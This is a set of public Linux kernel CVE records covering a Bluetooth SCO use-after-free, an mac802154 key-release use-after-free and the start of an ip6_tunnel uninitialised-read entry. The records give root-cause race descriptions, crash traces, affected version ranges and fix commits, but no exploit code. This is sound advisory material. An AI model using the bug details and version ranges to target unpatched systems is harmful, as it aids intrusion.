| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 48669c81a65628ef234cbdd91b9395952c7c27fe Version: 37d7ae2b0578f2373674a755402ee722e96edc08 Version: a1073aad497d0d071a71f61b721966a176d50c08 Version: ba316be1b6a00db7126ed9a39f9bee434a508043 Version: ba316be1b6a00db7126ed9a39f9bee434a508043 Version: ba316be1b6a00db7126ed9a39f9bee434a508043 Version: ba316be1b6a00db7126ed9a39f9bee434a508043 Version: ba316be1b6a00db7126ed9a39f9bee434a508043 Version: fea63ccd928c01573306983346588b26cffb5572 Version: ec1f74319bb35c1c90c25014ec0f6ea6c3ca2134 Version: b657bba82ff6a007d84fd076bd73b11131726a2b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27398",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T15:29:55.290790Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T15:30:07.351Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-11-30T08:03:15.930Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1b33d55fb7355e27f8c82cd4ecd560f162469249"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3212afd00e3cda790fd0583cb3eaef8f9575a014"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/33a6e92161a78c1073d90e27abe28d746feb0a53"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6a18eeb1b3bbc67c20d9609c31dca6a69b4bcde5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bfab2c1f7940a232cd519e82fff137e308abfd93"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/012363cb1bec5f33a7b94629ab2c1086f30280f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/50c2037fc28df870ef29d9728c770c8955d32178"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/483bc08181827fc475643272ffb69c533007e546"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OTB4HWU2PTVW5NEYHHLOCXDKG3PYA534/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DW2MIOIMOFUSNLHLRYX23AFR36BMKD65/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240912-0012/"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/11/29/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/11/30/1"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/11/30/2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/sco.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1b33d55fb7355e27f8c82cd4ecd560f162469249",
"status": "affected",
"version": "48669c81a65628ef234cbdd91b9395952c7c27fe",
"versionType": "git"
},
{
"lessThan": "3212afd00e3cda790fd0583cb3eaef8f9575a014",
"status": "affected",
"version": "37d7ae2b0578f2373674a755402ee722e96edc08",
"versionType": "git"
},
{
"lessThan": "33a6e92161a78c1073d90e27abe28d746feb0a53",
"status": "affected",
"version": "a1073aad497d0d071a71f61b721966a176d50c08",
"versionType": "git"
},
{
"lessThan": "6a18eeb1b3bbc67c20d9609c31dca6a69b4bcde5",
"status": "affected",
"version": "ba316be1b6a00db7126ed9a39f9bee434a508043",
"versionType": "git"
},
{
"lessThan": "bfab2c1f7940a232cd519e82fff137e308abfd93",
"status": "affected",
"version": "ba316be1b6a00db7126ed9a39f9bee434a508043",
"versionType": "git"
},
{
"lessThan": "012363cb1bec5f33a7b94629ab2c1086f30280f2",
"status": "affected",
"version": "ba316be1b6a00db7126ed9a39f9bee434a508043",
"versionType": "git"
},
{
"lessThan": "50c2037fc28df870ef29d9728c770c8955d32178",
"status": "affected",
"version": "ba316be1b6a00db7126ed9a39f9bee434a508043",
"versionType": "git"
},
{
"lessThan": "483bc08181827fc475643272ffb69c533007e546",
"status": "affected",
"version": "ba316be1b6a00db7126ed9a39f9bee434a508043",
"versionType": "git"
},
{
"status": "affected",
"version": "fea63ccd928c01573306983346588b26cffb5572",
"versionType": "git"
},
{
"status": "affected",
"version": "ec1f74319bb35c1c90c25014ec0f6ea6c3ca2134",
"versionType": "git"
},
{
"status": "affected",
"version": "b657bba82ff6a007d84fd076bd73b11131726a2b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/sco.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.15"
},
{
"lessThan": "5.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.314",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.276",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.314",
"versionStartIncluding": "4.19.207",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.276",
"versionStartIncluding": "5.4.148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.10.67",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.263",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.13.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.14.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: Fix use-after-free bugs caused by sco_sock_timeout\n\nWhen the sco connection is established and then, the sco socket\nis releasing, timeout_work will be scheduled to judge whether\nthe sco disconnection is timeout. The sock will be deallocated\nlater, but it is dereferenced again in sco_sock_timeout. As a\nresult, the use-after-free bugs will happen. The root cause is\nshown below:\n\n Cleanup Thread | Worker Thread\nsco_sock_release |\n sco_sock_close |\n __sco_sock_close |\n sco_sock_set_timer |\n schedule_delayed_work |\n sco_sock_kill | (wait a time)\n sock_put(sk) //FREE | sco_sock_timeout\n | sock_hold(sk) //USE\n\nThe KASAN report triggered by POC is shown below:\n\n[ 95.890016] ==================================================================\n[ 95.890496] BUG: KASAN: slab-use-after-free in sco_sock_timeout+0x5e/0x1c0\n[ 95.890755] Write of size 4 at addr ffff88800c388080 by task kworker/0:0/7\n...\n[ 95.890755] Workqueue: events sco_sock_timeout\n[ 95.890755] Call Trace:\n[ 95.890755] \u003cTASK\u003e\n[ 95.890755] dump_stack_lvl+0x45/0x110\n[ 95.890755] print_address_description+0x78/0x390\n[ 95.890755] print_report+0x11b/0x250\n[ 95.890755] ? __virt_addr_valid+0xbe/0xf0\n[ 95.890755] ? sco_sock_timeout+0x5e/0x1c0\n[ 95.890755] kasan_report+0x139/0x170\n[ 95.890755] ? update_load_avg+0xe5/0x9f0\n[ 95.890755] ? sco_sock_timeout+0x5e/0x1c0\n[ 95.890755] kasan_check_range+0x2c3/0x2e0\n[ 95.890755] sco_sock_timeout+0x5e/0x1c0\n[ 95.890755] process_one_work+0x561/0xc50\n[ 95.890755] worker_thread+0xab2/0x13c0\n[ 95.890755] ? pr_cont_work+0x490/0x490\n[ 95.890755] kthread+0x279/0x300\n[ 95.890755] ? pr_cont_work+0x490/0x490\n[ 95.890755] ? kthread_blkcg+0xa0/0xa0\n[ 95.890755] ret_from_fork+0x34/0x60\n[ 95.890755] ? kthread_blkcg+0xa0/0xa0\n[ 95.890755] ret_from_fork_asm+0x11/0x20\n[ 95.890755] \u003c/TASK\u003e\n[ 95.890755]\n[ 95.890755] Allocated by task 506:\n[ 95.890755] kasan_save_track+0x3f/0x70\n[ 95.890755] __kasan_kmalloc+0x86/0x90\n[ 95.890755] __kmalloc+0x17f/0x360\n[ 95.890755] sk_prot_alloc+0xe1/0x1a0\n[ 95.890755] sk_alloc+0x31/0x4e0\n[ 95.890755] bt_sock_alloc+0x2b/0x2a0\n[ 95.890755] sco_sock_create+0xad/0x320\n[ 95.890755] bt_sock_create+0x145/0x320\n[ 95.890755] __sock_create+0x2e1/0x650\n[ 95.890755] __sys_socket+0xd0/0x280\n[ 95.890755] __x64_sys_socket+0x75/0x80\n[ 95.890755] do_syscall_64+0xc4/0x1b0\n[ 95.890755] entry_SYSCALL_64_after_hwframe+0x67/0x6f\n[ 95.890755]\n[ 95.890755] Freed by task 506:\n[ 95.890755] kasan_save_track+0x3f/0x70\n[ 95.890755] kasan_save_free_info+0x40/0x50\n[ 95.890755] poison_slab_object+0x118/0x180\n[ 95.890755] __kasan_slab_free+0x12/0x30\n[ 95.890755] kfree+0xb2/0x240\n[ 95.890755] __sk_destruct+0x317/0x410\n[ 95.890755] sco_sock_release+0x232/0x280\n[ 95.890755] sock_close+0xb2/0x210\n[ 95.890755] __fput+0x37f/0x770\n[ 95.890755] task_work_run+0x1ae/0x210\n[ 95.890755] get_signal+0xe17/0xf70\n[ 95.890755] arch_do_signal_or_restart+0x3f/0x520\n[ 95.890755] syscall_exit_to_user_mode+0x55/0x120\n[ 95.890755] do_syscall_64+0xd1/0x1b0\n[ 95.890755] entry_SYSCALL_64_after_hwframe+0x67/0x6f\n[ 95.890755]\n[ 95.890755] The buggy address belongs to the object at ffff88800c388000\n[ 95.890755] which belongs to the cache kmalloc-1k of size 1024\n[ 95.890755] The buggy address is located 128 bytes inside of\n[ 95.890755] freed 1024-byte region [ffff88800c388000, ffff88800c388400)\n[ 95.890755]\n[ 95.890755] The buggy address belongs to the physical page:\n[ 95.890755] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff88800c38a800 pfn:0xc388\n[ 95.890755] head: order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0\n[ 95.890755] ano\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:31.938Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1b33d55fb7355e27f8c82cd4ecd560f162469249"
},
{
"url": "https://git.kernel.org/stable/c/3212afd00e3cda790fd0583cb3eaef8f9575a014"
},
{
"url": "https://git.kernel.org/stable/c/33a6e92161a78c1073d90e27abe28d746feb0a53"
},
{
"url": "https://git.kernel.org/stable/c/6a18eeb1b3bbc67c20d9609c31dca6a69b4bcde5"
},
{
"url": "https://git.kernel.org/stable/c/bfab2c1f7940a232cd519e82fff137e308abfd93"
},
{
"url": "https://git.kernel.org/stable/c/012363cb1bec5f33a7b94629ab2c1086f30280f2"
},
{
"url": "https://git.kernel.org/stable/c/50c2037fc28df870ef29d9728c770c8955d32178"
},
{
"url": "https://git.kernel.org/stable/c/483bc08181827fc475643272ffb69c533007e546"
}
],
"title": "Bluetooth: Fix use-after-free bugs caused by sco_sock_timeout",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27398",
"datePublished": "2024-05-13T10:22:26.624Z",
"dateReserved": "2024-02-25T13:47:42.681Z",
"dateUpdated": "2025-05-04T12:55:31.938Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26961 (GCVE-0-2024-26961)
Vulnerability from cvelistv5
Published
2024-05-01 05:19
Modified
2025-05-04 09:00
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mac802154: fix llsec key resources release in mac802154_llsec_key_del
mac802154_llsec_key_del() can free resources of a key directly without
following the RCU rules for waiting before the end of a grace period. This
may lead to use-after-free in case llsec_lookup_key() is traversing the
list of keys in parallel with a key deletion:
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 4 PID: 16000 at lib/refcount.c:25 refcount_warn_saturate+0x162/0x2a0
Modules linked in:
CPU: 4 PID: 16000 Comm: wpan-ping Not tainted 6.7.0 #19
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:refcount_warn_saturate+0x162/0x2a0
Call Trace:
<TASK>
llsec_lookup_key.isra.0+0x890/0x9e0
mac802154_llsec_encrypt+0x30c/0x9c0
ieee802154_subif_start_xmit+0x24/0x1e0
dev_hard_start_xmit+0x13e/0x690
sch_direct_xmit+0x2ae/0xbc0
__dev_queue_xmit+0x11dd/0x3c20
dgram_sendmsg+0x90b/0xd60
__sys_sendto+0x466/0x4c0
__x64_sys_sendto+0xe0/0x1c0
do_syscall_64+0x45/0xf0
entry_SYSCALL_64_after_hwframe+0x6e/0x76
Also, ieee802154_llsec_key_entry structures are not freed by
mac802154_llsec_key_del():
unreferenced object 0xffff8880613b6980 (size 64):
comm "iwpan", pid 2176, jiffies 4294761134 (age 60.475s)
hex dump (first 32 bytes):
78 0d 8f 18 80 88 ff ff 22 01 00 00 00 00 ad de x.......".......
00 00 00 00 00 00 00 00 03 00 cd ab 00 00 00 00 ................
backtrace:
[<ffffffff81dcfa62>] __kmem_cache_alloc_node+0x1e2/0x2d0
[<ffffffff81c43865>] kmalloc_trace+0x25/0xc0
[<ffffffff88968b09>] mac802154_llsec_key_add+0xac9/0xcf0
[<ffffffff8896e41a>] ieee802154_add_llsec_key+0x5a/0x80
[<ffffffff8892adc6>] nl802154_add_llsec_key+0x426/0x5b0
[<ffffffff86ff293e>] genl_family_rcv_msg_doit+0x1fe/0x2f0
[<ffffffff86ff46d1>] genl_rcv_msg+0x531/0x7d0
[<ffffffff86fee7a9>] netlink_rcv_skb+0x169/0x440
[<ffffffff86ff1d88>] genl_rcv+0x28/0x40
[<ffffffff86fec15c>] netlink_unicast+0x53c/0x820
[<ffffffff86fecd8b>] netlink_sendmsg+0x93b/0xe60
[<ffffffff86b91b35>] ____sys_sendmsg+0xac5/0xca0
[<ffffffff86b9c3dd>] ___sys_sendmsg+0x11d/0x1c0
[<ffffffff86b9c65a>] __sys_sendmsg+0xfa/0x1d0
[<ffffffff88eadbf5>] do_syscall_64+0x45/0xf0
[<ffffffff890000ea>] entry_SYSCALL_64_after_hwframe+0x6e/0x76
Handle the proper resource release in the RCU callback function
mac802154_llsec_key_del_rcu().
Note that if llsec_lookup_key() finds a key, it gets a refcount via
llsec_key_get() and locally copies key id from key_entry (which is a
list element). So it's safe to call llsec_key_put() and free the list
entry after the RCU grace period elapses.
Found by Linux Verification Center (linuxtesting.org).
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 5d637d5aabd85132bd85779677d8acb708e0ed90 Version: 5d637d5aabd85132bd85779677d8acb708e0ed90 Version: 5d637d5aabd85132bd85779677d8acb708e0ed90 Version: 5d637d5aabd85132bd85779677d8acb708e0ed90 Version: 5d637d5aabd85132bd85779677d8acb708e0ed90 Version: 5d637d5aabd85132bd85779677d8acb708e0ed90 Version: 5d637d5aabd85132bd85779677d8acb708e0ed90 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26961",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-28T17:51:17.536237Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:15.130Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.779Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/068ab2759bc0b4daf0b964de61b2731449c86531"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d3d858650933d44ac12c1f31337e7110c2071821"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dcd51ab42b7a0431575689c5f74b8b6efd45fc2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/20d3e1c8a1847497269f04d874b2a5818ec29e2d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/640297c3e897bd7e1481466a6a5cb9560f1edb88"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49c8951680d7b76fceaee89dcfbab1363fb24fd1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8a1e58345cf40b7b272e08ac7b32328b2543e40"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/cfg802154.h",
"net/mac802154/llsec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "068ab2759bc0b4daf0b964de61b2731449c86531",
"status": "affected",
"version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
"versionType": "git"
},
{
"lessThan": "d3d858650933d44ac12c1f31337e7110c2071821",
"status": "affected",
"version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
"versionType": "git"
},
{
"lessThan": "dcd51ab42b7a0431575689c5f74b8b6efd45fc2f",
"status": "affected",
"version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
"versionType": "git"
},
{
"lessThan": "20d3e1c8a1847497269f04d874b2a5818ec29e2d",
"status": "affected",
"version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
"versionType": "git"
},
{
"lessThan": "640297c3e897bd7e1481466a6a5cb9560f1edb88",
"status": "affected",
"version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
"versionType": "git"
},
{
"lessThan": "49c8951680d7b76fceaee89dcfbab1363fb24fd1",
"status": "affected",
"version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
"versionType": "git"
},
{
"lessThan": "e8a1e58345cf40b7b272e08ac7b32328b2543e40",
"status": "affected",
"version": "5d637d5aabd85132bd85779677d8acb708e0ed90",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/cfg802154.h",
"net/mac802154/llsec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.16"
},
{
"lessThan": "3.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmac802154: fix llsec key resources release in mac802154_llsec_key_del\n\nmac802154_llsec_key_del() can free resources of a key directly without\nfollowing the RCU rules for waiting before the end of a grace period. This\nmay lead to use-after-free in case llsec_lookup_key() is traversing the\nlist of keys in parallel with a key deletion:\n\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 4 PID: 16000 at lib/refcount.c:25 refcount_warn_saturate+0x162/0x2a0\nModules linked in:\nCPU: 4 PID: 16000 Comm: wpan-ping Not tainted 6.7.0 #19\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014\nRIP: 0010:refcount_warn_saturate+0x162/0x2a0\nCall Trace:\n \u003cTASK\u003e\n llsec_lookup_key.isra.0+0x890/0x9e0\n mac802154_llsec_encrypt+0x30c/0x9c0\n ieee802154_subif_start_xmit+0x24/0x1e0\n dev_hard_start_xmit+0x13e/0x690\n sch_direct_xmit+0x2ae/0xbc0\n __dev_queue_xmit+0x11dd/0x3c20\n dgram_sendmsg+0x90b/0xd60\n __sys_sendto+0x466/0x4c0\n __x64_sys_sendto+0xe0/0x1c0\n do_syscall_64+0x45/0xf0\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\nAlso, ieee802154_llsec_key_entry structures are not freed by\nmac802154_llsec_key_del():\n\nunreferenced object 0xffff8880613b6980 (size 64):\n comm \"iwpan\", pid 2176, jiffies 4294761134 (age 60.475s)\n hex dump (first 32 bytes):\n 78 0d 8f 18 80 88 ff ff 22 01 00 00 00 00 ad de x.......\".......\n 00 00 00 00 00 00 00 00 03 00 cd ab 00 00 00 00 ................\n backtrace:\n [\u003cffffffff81dcfa62\u003e] __kmem_cache_alloc_node+0x1e2/0x2d0\n [\u003cffffffff81c43865\u003e] kmalloc_trace+0x25/0xc0\n [\u003cffffffff88968b09\u003e] mac802154_llsec_key_add+0xac9/0xcf0\n [\u003cffffffff8896e41a\u003e] ieee802154_add_llsec_key+0x5a/0x80\n [\u003cffffffff8892adc6\u003e] nl802154_add_llsec_key+0x426/0x5b0\n [\u003cffffffff86ff293e\u003e] genl_family_rcv_msg_doit+0x1fe/0x2f0\n [\u003cffffffff86ff46d1\u003e] genl_rcv_msg+0x531/0x7d0\n [\u003cffffffff86fee7a9\u003e] netlink_rcv_skb+0x169/0x440\n [\u003cffffffff86ff1d88\u003e] genl_rcv+0x28/0x40\n [\u003cffffffff86fec15c\u003e] netlink_unicast+0x53c/0x820\n [\u003cffffffff86fecd8b\u003e] netlink_sendmsg+0x93b/0xe60\n [\u003cffffffff86b91b35\u003e] ____sys_sendmsg+0xac5/0xca0\n [\u003cffffffff86b9c3dd\u003e] ___sys_sendmsg+0x11d/0x1c0\n [\u003cffffffff86b9c65a\u003e] __sys_sendmsg+0xfa/0x1d0\n [\u003cffffffff88eadbf5\u003e] do_syscall_64+0x45/0xf0\n [\u003cffffffff890000ea\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\nHandle the proper resource release in the RCU callback function\nmac802154_llsec_key_del_rcu().\n\nNote that if llsec_lookup_key() finds a key, it gets a refcount via\nllsec_key_get() and locally copies key id from key_entry (which is a\nlist element). So it\u0027s safe to call llsec_key_put() and free the list\nentry after the RCU grace period elapses.\n\nFound by Linux Verification Center (linuxtesting.org)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:00:52.446Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/068ab2759bc0b4daf0b964de61b2731449c86531"
},
{
"url": "https://git.kernel.org/stable/c/d3d858650933d44ac12c1f31337e7110c2071821"
},
{
"url": "https://git.kernel.org/stable/c/dcd51ab42b7a0431575689c5f74b8b6efd45fc2f"
},
{
"url": "https://git.kernel.org/stable/c/20d3e1c8a1847497269f04d874b2a5818ec29e2d"
},
{
"url": "https://git.kernel.org/stable/c/640297c3e897bd7e1481466a6a5cb9560f1edb88"
},
{
"url": "https://git.kernel.org/stable/c/49c8951680d7b76fceaee89dcfbab1363fb24fd1"
},
{
"url": "https://git.kernel.org/stable/c/e8a1e58345cf40b7b272e08ac7b32328b2543e40"
}
],
"title": "mac802154: fix llsec key resources release in mac802154_llsec_key_del",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26961",
"datePublished": "2024-05-01T05:19:16.361Z",
"dateReserved": "2024-02-19T14:20:24.201Z",
"dateUpdated": "2025-05-04T09:00:52.446Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26633 (GCVE-0-2024-26633)
Vulnerability from cvelistv5
Published
2024-03-18 10:07
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()
syzbot pointed out [1] that NEXTHDR_FRAGMENT handling is broken.
Reading frag_off can only be done if we pulled enough bytes
to skb->head. Currently we might access garbage.
[1]
BUG: KMSAN: uninit-value in ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0
ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0
